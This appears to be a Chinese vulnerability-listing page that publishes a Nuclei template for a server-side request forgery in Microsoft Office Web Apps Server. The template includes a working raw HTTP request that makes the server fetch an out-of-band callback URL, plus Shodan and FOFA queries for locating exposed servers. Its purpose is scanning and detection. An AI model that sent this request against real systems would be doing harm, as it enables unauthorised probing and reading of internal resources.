office-webapps-ssrf: Office Web Apps Server Full Read - Server Side Request Forgery

日期: 2025-08-01 | 影响软件: Office Web Apps | POC: 已公开

漏洞描述

Office Web Apps Server Full Read is vulnerable to SSRF.

PoC代码[已公开]

id: office-webapps-ssrf

info:
  name: Office Web Apps Server Full Read - Server Side Request Forgery
  author: DhiyaneshDK
  severity: high
  description: Office Web Apps Server Full Read is vulnerable to SSRF.
  reference:
    - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
  classification:
    cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Provide a link that opens Word"
    fofa-query: body="Provide a link that opens Word"
    product: office_web_apps_server
    vendor: microsoft
  tags: microsoft,office-webapps,redirect,vuln
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')
          - contains(body,'<h1> Interactsh Server </h1>')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022035d20e0aceaba626e5a07ffc8aa5abd777f482d1dc1652b64c11a2928a1f62bd022100cb90897d9796e74ed059668c0b2d4262347c30c5dc8c751cda2d06c0bd2e41d8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐